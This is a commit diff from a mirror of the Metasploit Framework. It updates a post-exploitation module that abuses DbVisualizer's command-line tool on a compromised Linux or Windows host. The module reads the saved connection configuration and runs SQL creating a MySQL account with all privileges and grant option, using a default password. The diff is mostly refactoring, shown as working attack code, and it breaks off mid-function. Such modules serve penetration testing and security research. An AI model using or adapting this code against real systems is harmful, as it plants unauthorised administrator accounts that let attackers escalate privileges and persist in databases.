infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update dbvis_add_db_admin.rb 

Corrections
bug/bundler_fix
David Bloom 2014-07-16 13:42:58 +02:00
parent 875c024243
commit b602fc89a3
1 changed files with 80 additions and 86 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

166
modules/post/multi/manage/dbvis_add_db_admin.rb
View File

@ -10,14 +10,15 @@ class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info={})
super( update_info( info,
'Name' => 'Multi manage Dbvis add remote admin',
'Name' => 'Multi Manage Dbvis Add Db Admin',
'Description' => %q{
Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases (With GUI).
Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases (With GUI).
The remote database can be accessed from the command line without the need to authenticate.
The module abuses this functionality to create an administrator in the database if DB user rights allow it.
The module abuses this functionality to create an administrator in the database if DB user rights allow it.
Supported databases : mysql (More supported soon)
},
'License' => MSF_LICENSE,
'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
@ -28,35 +29,33 @@ class Metasploit3 < Msf::Post
[
OptString.new('DBALIAS', [true,'Use dbvis_enum module to find out databases and aliases', 'localhost']),
OptString.new('DBUSERNAME', [true,'The user you want to add to the remote database', 'msf']),
OptString.new('DBPASSWORD', [true,'User password to set', 'msfRocks']),
OptBool.new('VERBOSE', [ true , 'Print sql response', false]),
OptString.new('DBPASSWORD', [true,'User password to set', 'msfRocks'])
], self.class)
end
def run
dbType = existAndSupported()
unless dbType.nil?
dbvis = findDbviscmd()
unless dbvis.nil?
sql = getSQL(dbType)
errors = dbvisQuery(dbvis,sql)
db_type = exist_and_supported()
unless db_type.blank?
dbvis = find_dbviscmd()
unless dbvis.blank?
sql = get_sql(db_type)
errors = dbvis_query(dbvis,sql)
if errors == true
print_error("No luck today, access is probably denied for configured user !? Try in verbose mode to know what happened. ")
print_error("No luck today, access is probably denied for configured user !? Try in verbose mode to know what happened. ")
else
print_good("Privileged user created ! Try now to connect with user : #{datastore['DBUSERNAME']} and password : #{datastore['DBPASSWORD']}")
print_good("Privileged user created ! Try now to connect with user : #{datastore['DBUSERNAME']} and password : #{datastore['DBPASSWORD']}")
end
end
end
end
# Check if the alias exist and if database is supported by this script
def existAndSupported()
def exist_and_supported()
case session.platform
when /linux/
user = session.shell_command("whoami").chomp
print_status("Current user is " + user)
user = session.shell_command("whoami")
print_status("Current user is #{user}")
if (user =~ /root/)
user_base = "/root/"
else
@ -65,7 +64,7 @@ class Metasploit3 < Msf::Post
dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
when /win/
user_profile = session.sys.config.getenv('USERPROFILE')
dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
dbvis_file = "#{user_profile}\\.dbvis\\config70\\dbvis.xml"
end
unless file?(dbvis_file)
@ -74,18 +73,18 @@ class Metasploit3 < Msf::Post
print_status("This could be an older version of dbvis, trying old path")
case session.platform
when /linux/
dbvis_file = user_base + ".dbvis/config/dbvis.xml"
dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
when /win/
dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
dbvis_file = "#{user_profile }\\.dbvis\\config\\dbvis.xml"
end
unless file?(dbvis_file)
print_error("File not found: " + dbvis_file)
print_error("File not found: #{dbvis_file}")
return
end
oldversion= true
old_version= true
end
print_status("Reading: " + dbvis_file )
print_status("Reading : #{dbvis_file}" )
raw_xml = ""
begin
raw_xml = read_file(dbvis_file)
@ -95,75 +94,75 @@ class Metasploit3 < Msf::Post
return
end
dbfound=false
aliasFound=false
dbType=nil
dbTypeOk=false
db_found=false
alias_found=false
db_type=nil
db_type_ok=false
# fetch config file
raw_xml.each_line do |line|
if line =~ /<Database id=/
dbfound = true
db_found = true
elsif line =~ /<\/Database>/
dbfound=false
db_found=false
end
if dbfound == true
if db_found == true
# checkthe alias
if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
if datastore['DBALIAS'] == $1
aliasFound = true
alias_found = true
print_good("Alias #{datastore['DBALIAS']} found in dbvis.xml")
end
end
end
if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
if aliasFound
print_good("Username for this connection : " + $1)
end
if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
if alias_found
print_good("Username for this connection : #{$1}")
end
end
# check the type
if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
if aliasFound
dbType = $1
dbTypeOk = checkDbType(dbType)
if dbTypeOk
print_good("Database #{dbType} is supported ")
else
print_error("Database #{dbType} is not supported (yet)")
dbType=nil
end
aliasFound = false
if alias_found
db_type = $1
db_type_ok = check_db_type(db_type)
if db_type_ok
print_good("Database #{db_type} is supported ")
else
print_error("Database #{db_type} is not supported (yet)")
db_type=nil
end
alias_found = false
end
end
end
end
if dbType.nil?
print_error("Database alias not found in dbvis.xml")
if db_type.blank?
print_error("Database alias not found in dbvis.xml")
end
return dbType # That is empty if DB is not supported
return db_type # That is empty if DB is not supported
end
# Find path to dbviscmd.sh|bat
def findDbviscmd
def find_dbviscmd
case session.platform
when /linux/
dbVis = session.shell_command("locate dbviscmd.sh").chomp
if dbVis.nil? or dbVis.chomp==""
dbvis = session.shell_command("locate dbviscmd.sh").chomp
if dbvis.chomp==""
print_error("dbviscmd.sh not found")
return nil
else
print_good("Dbviscmd found : " + dbVis )
print_good("Dbviscmd found : #{dbvis}")
end
when /win/
# Find program files
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = progfiles_env['ProgramFiles(X86)']
if not progfilesx86.nil? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
program_files = progfilesx86 # x64
progfiles_x86 = progfiles_env['ProgramFiles(X86)']
if not progfiles_x86.blank? and progfiles_x86 !~ /%ProgramFiles\(X86\)%/
program_files = progfiles_x86 # x64
else
program_files = progfiles_env['ProgramFiles'] # x86
end
@ -171,63 +170,58 @@ class Metasploit3 < Msf::Post
session.fs.dir.foreach(program_files) do |d|
dirs << d
end
dbvisHomeDir = nil
dbvis_home_dir = nil
#Browse program content to find a possible dbvis home
dirs.each do |d|
if (d =~ /DbVisualizer[\S+\s+]+/i)
dbvisHomeDir=d
dbvis_home_dir=d
end
end
if dbvisHomeDir.nil?
if dbvis_home_dir.blank?
print_error("Dbvis home not found, maybe uninstalled ?")
return nil
end
dbVis = program_files + "\\" + dbvisHomeDir + "\\dbviscmd.bat"
unless file?(dbVis)
dbvis = "#{program_files}\\#{dbvis_home_dir}\\dbviscmd.bat"
unless file?(dbvis)
print_error("dbviscmd.bat not found")
return nil
end
print_good("Dbviscmd found : " + dbVis )
print_good("Dbviscmd found : #{dbvis}")
end
return dbVis
return dbvis
end
# Query execution method
def dbvisQuery(dbvis,sql)
def dbvis_query(dbvis,sql)
error =false
resp=''
#session.response_timeout=60
print_status("Trying to execute evil sql, it can take time ...")
args = "-connection " + datastore['DBALIAS'] + " -sql \"" + sql + "\""
dbvis="\"" + dbvis + "\""
resp = session.sys.process.execute(dbvis, args, {'Hidden' => true, 'Channelized' => true})
while(d = resp.channel.read)
if datastore['VERBOSE'] == true
print_status("#{d}")
end
if d =~ /denied|failed/i
error = true
if file?(dbvis)==true
print_status("Trying to execute evil sql, it can take time ...")
args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
dbvis ="\"#{dbvis}\""
cmd = "#{dbvis} #{args}"
resp = cmd_exec(cmd)
vprint_line("")
vprint_status("#{resp}")
if resp =~ /denied|failed/i
error = true
end
else
print_error("#{dbvis} is not a file")
end
resp.channel.close
resp.close
return error
rescue ::Exception => e
print_error("Error Running Command: #{e.class} #{e}")
end
# Database dependent part
# Check if db type is supported by this script
def checkDbType(type)
def check_db_type(type)
return type.to_s =~ /mysql/i
end
# Build proper sql
def getSQL(dbType)
if dbType =~ /mysql/i
# Build proper sql
def get_sql(db_type)
if db_type =~ /mysql/i
sql = "CREATE USER '#{datastore['DBUSERNAME']}'@'localhost' IDENTIFIED BY '#{datastore['DBPASSWORD']}';"
sql += "GRANT ALL PRIVILEGES ON *.* TO '#{datastore['DBUSERNAME']}'@'localhost' WITH GRANT OPTION;"